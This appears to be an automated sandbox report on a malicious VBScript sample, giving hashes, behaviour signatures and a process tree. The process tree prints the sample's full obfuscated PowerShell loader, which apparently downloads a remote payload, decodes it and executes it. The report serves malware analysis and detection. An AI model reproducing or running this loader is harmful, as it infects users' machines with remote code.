Analysis

  • max time kernel
    146s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/06/2024, 13:22

General

  • Target

    033MSOG241591GHD.out.vbs

  • Size

    22KB

  • MD5

    59466d59d80a2429567c23520135b4b6

  • SHA1

    13453bf0b8f5b716ad554afed8f8acbf0cb65403

  • SHA256

    c2ad492e30a53307f299b6694e479e0d55d0c6e3505c1d7929366e905aab3d9a

  • SHA512

    77187a4174d6bc47935aa5962a72cbacf629f1927133879c9957850ca5178e96485cf5dccb3e95b994128b02346a1454c3c6e80b553f7c8f8b207560fc491bf3

  • SSDEEP

    384:9Ru1EJgdf/HWD4Zx4vBlxSrfsy1E90TOntMQQ0hkCJUjdxmW:9Ru1NF/WDMxE/xSrfsL90ynK6ZJQxX

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\033MSOG241591GHD.out.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle hidden "$Vurderingsmndene = 1;Function Corbin($overcools){$Tristimulus=$overcools.Length-$Vurderingsmndene;$Bulgy='Substring';For( $Oliekilde17=4;$Oliekilde17 -lt $Tristimulus;$Oliekilde17+=5){$Selfsustainingly+=$overcools.$Bulgy.Invoke( $Oliekilde17, $Vurderingsmndene);}$Selfsustainingly;}function Digitaliser($Fractioning){ & ($Hverne) ($Fractioning);}$Distributrnet=Corbin 'SnapMUnino ParzForeiD,mblmicrlCha,a,jel/Pese5Nucl. Ri,0M.sa Afri(Bei.W BraiUnprnBjniddykkoPenswOve.sprov AfleNnrvrT ove Hedo1 Tri0 ,rk. Fav0bibl; xtr MantWAulei LocnCrat6Uhol4 Lun;Udgi Chufx Rav6Dirk4M ll;Phyl TulirL,erv,kan:Bar,1Reko2 ,av1Stnk.Radi0Slam)Mutt Pan,GTaoie B.wcC,emkStilo Te./Cinc2Bloo0e gl1Dila0mice0Apri1Gods0Ly,r1Bent IndFI.ogiHensrforbeStavfDideoF.agxdism/ G.y1U.nn2 ill1Bort. amb0Stri ';$Admen=Corbin ' Va UKerasFreseGouvrrasp-Gen.Abootg DeleJulenNurst,upe ';$Beerily=Corbin 'EvighPurstovertI.tepLovb:Mode/Beed/C,ese SteqNobeu fleiUnwhpP.sse KonsEa lgInten katSwit.MusisBreva ,pr.Munkc Ty.oltn mRest/ HypBUn rrN taa,ustnSalgdSo.sbposto HlsmGen,bB gieNe fsR gi.,isahpreahFunnk cym ';$Graduerende156=Corbin 'Pseu> Ava ';$Hverne=Corbin 'Sh.cimisseTensx hjt ';$Retrospektions='Gslings';$Adverbialize = Corbin 'BuseeresocselvhWardoOkku Fi,a%Org aBargpT.bup Deldops.a,nmat FinaPrek% Sl.\MiniS Ta t,roniSerolFoollDetaestrblBog.eStrig bi,sPost.Skriu,nkyl D,bvBeta Orga&Ndpl&Gips blinehilbcCe,lh AfsoFrav unretHod ';Digitaliser (Corbin 'D,ge$Melog ortl DanoKon,bL.mbapolil Com: ScaTNitraHul nJ.rddMy.mrDo no GendSacrsInefbWid.e Remtdicon .xidOscierenolDirlsUsp.eSubirE.ols Sma=Emb.(R.vfchypem Aktdfl.e Mell/FipscUnfo sids$ ,ogAAfsndJutlv,esmeTotarKancbIngei.reaa Cy l.aryiSlatz Musebr.s)Coun ');Digitaliser (Corbin 'Brkj$OutrgNe rlHoveoPetrbFosfaSpillCont: DysP H.piSkiln UdrlPaapiDrejgSha,=Dent$Sim.BBouneClioeArnor AnhiMicrlCereyUd.v.H rns,ydrpSelvlBrndisvi.tRese(Lini$Nav GCathrUnimaCaped.tilu .eteFluerSalae .ycnTer,dWiree Fre1Came5 ,ke6Buc.)Matt ');$Beerily=$Pinlig[0];$ustadighedens= (Corbin 'Fash$ MacgGrnslF.kuo Monb ShiaAridlHalf: HilG aute aannMarmn lvee C.nm,avotSk.lrCrepkPr,skWhale KitnF emdJin eUsynsReno= UncN.alae Spewfi.i-DiswOBearbPimpjTaktesplacB votS,ov CandSF gsyPlejs,ilotSvabeSaddm Ton.TornN DameServt H.p. UncWsu,ae Renb olyCOdonlaveriHaireUninn,lomt');$ustadighedens+=$Tandrodsbetndelsers[1];Digitaliser ($ustadighedens);Digitaliser (Corbin 'Isoc$ P aGMaileJerrnHeren egaePuz.mOrtot Knor.uickmystk AlvePol n St dLgehe,abrsPell.Se tHPorgeBrnda anddForee Bder Un.sLap.[He.a$waffA,ysndCacom Pa.e GlonRo o] B,y= Tyd$S,arD,orsih tpsKa.atD,parOm.oi Semb Opsucocrt Untr refnGalee HootVind ');$Tyndvgget=Corbin 'gavs$VectG Sp,e BrsnTrusnLazyedesimStyntU,plr Hagkforck,bseeRe,unHousdAn.ie OnosKo g.IncoDt beoGlauwSukkn fo l KiwotoxiaFiffdTropFComtiHypelB.sie Cla(xe.o$ NriBUne,eSupeeHelbrCisaiHemolAneuy A g,Rhac$Trang repr ForaR innGudeuOverlDrifaTranttechiK.sto Co,nSekseAen.rHystnXra eUnde) non ';$granulationerne=$Tandrodsbetndelsers[0];Digitaliser (Corbin 'skit$kologGldelUndeoEgesbMot.aVestlSemi: MinERes qLoftu begiPrajvSa.moGs.ec livaGrettMa.iiI.puoRac,nrimm=Filt(o.erT,pheeSplksf tit Exc- SupPR oxaStimt,ocohse.i Syvt$in egHolir HolaLyr ndk,iu BedludskaUlpftDeeriArthoI,gan PhyeRe,rr GranPh.teGree)Prep ');while (!$Equivocation) {Digitaliser (Corbin 'Drud$ .ycgAkuplFlago SpobkrlhaReprl Non: P oRFrytaSwahnBumbssp.neSqualMisllRene=Hil,$ ChotS ggr oru,ynseSten ') ;Digitaliser $Tyndvgget;Digitaliser (Corbin ' MotSSynctDrila,enirIndstue f-Nec.S,jrglBuc e,uhae IndpNonm takk4St.r ');Digitaliser (Corbin ' Pa,$Unpag Opsl Si.oTagrbNotaa SemlAmer:VrdiERektqAnt,u.eetiNedsvVandoModec ElvaV,rbtPotoiLit.oFacan,erb=Lydl( FilT Ty,eEntasBri,tmon -IdeaPImpaaDelptUni.hType Bre$ BelgGladrVol,aTokrnKappuForblFontaExpitC,aniVa,ioAnalnPrineMadrrTentnCataeHurl)Haye ') ;Digitaliser (Corbin ' ko,$ToetgSkovlBekro BrnbcaptaNol l Pro: GosG Af.aEle,rrin,dnazeb.issrUdl a ,rdcstereUndl= Mem$ rang GynlSneroUnreb BegaLaudlSnek: StiS.urraOprymForhm.efaeUtron issbVampy orgFuntgLucieToaddSh,ien dp+Redn+Clas%Para$bortP E siAumanPhosl PhoiEx eg.yns.Justc PhooSilhu O,knUd.itCrom ') ;$Beerily=$Pinlig[$Gardbrace];}$Guiding=313361;$Hygsom=28928;Digitaliser (Corbin ' nt$Pharg Wrol ViloAfpubObjeaSoftlRost:BeleLBurdaH.venadvod NyhbOp arRke,uSubsgSy,osM tea Nerr QuiePishaPerdlRec eMisar MatsKr.e R st= Sch AutoGM.lte Agit Tig-B,neCHjemo modnK.autFarleSpiknUnbitProd No m$ iorg AfprScypaLingnAcinu LamlSlanaSalmtInoxiO eroaandnRv reSvirrDes n MbleFree ');Digitaliser (Corbin 'Ven,$ AdmgParalImpao Bryb chra,ffil Mil:DiabrMathe G udSprosTyndtBlocaBarmrConct Br,sQuad Filc= Poo udb[SjufSSubayPenssWarlt .nreVannmHybr.,yksCR,seoAfhnnHelivChuceNoncrI,dmt hje]Rese:Impa:Aft FKal,rY,kao .etm Sp.BAnywa.ults.pile Azt6Copp4Pre SQuittR.mmrpedoiCamonEurygMira(Unde$cataL Ni aA,dinHaardProgbCozyr,urtuOua gvangs B ga torrGia,eD,skaPseuludbue,igmr PhasStat)Kals ');Digitaliser (Corbin 'ti.o$BjrngRel l C uoTilsbKanaa.alelSola:RevaDPyraeSharp R,ae Soondibbd Proa ypon .vrtAbdisSkat Til=T.ve Subt[ImmoSFlomyMi isCyphtHesteDatemHyld. DisT UrieY.guxLap,tFals. BukERevonUti.cUdsmoTrandBnk i AftnOmdegPe t]Yder: Hur:GrunA TekSMob.CGolfIun.eILini.FngsG.lute hentS,seSSkogtSjlerGonoi Nonn Sadgg.yc( mes$ PaarOldbeCorodIsotsJon.tB,ndaLigerCompt HarsVild)Abil ');Digitaliser (Corbin 'Udfa$ lgg.nwolSnekoAngobDeseaFiskl Tot: VowAEntogPromgMo.iePeddlSe,ia Indt ,nuiHor.o s.bnWo,d= Aqu$ R cDZongeDeclpBataeContnZonodAbsia.eginDolltTriqsSkam.AoifsWithuHe.abparos mpot,olkrApotisparnRygtga.an( U,t$HjemG uttuD,foiPrimdBlokiSu.gn s.lgCiv.,Sk.v$ SkrH UdsyDi ggShelsToo oBourm Nep)Vrne ');Digitaliser $Aggelation;"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1468
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stillelegs.ulv && echo t"
        3⤵
          PID:4164

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a3qexmpg.1qj.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/1468-0-0x00007FFE7DD73000-0x00007FFE7DD75000-memory.dmp

            Filesize

            8KB

          • memory/1468-1-0x000001E474540000-0x000001E474562000-memory.dmp

            Filesize

            136KB

          • memory/1468-11-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp

            Filesize

            10.8MB

          • memory/1468-12-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp

            Filesize

            10.8MB

          • memory/1468-13-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp

            Filesize

            10.8MB

          • memory/1468-14-0x00007FFE7DD73000-0x00007FFE7DD75000-memory.dmp

            Filesize

            8KB

          • memory/1468-15-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp

            Filesize

            10.8MB

          • memory/1468-16-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp

            Filesize

            10.8MB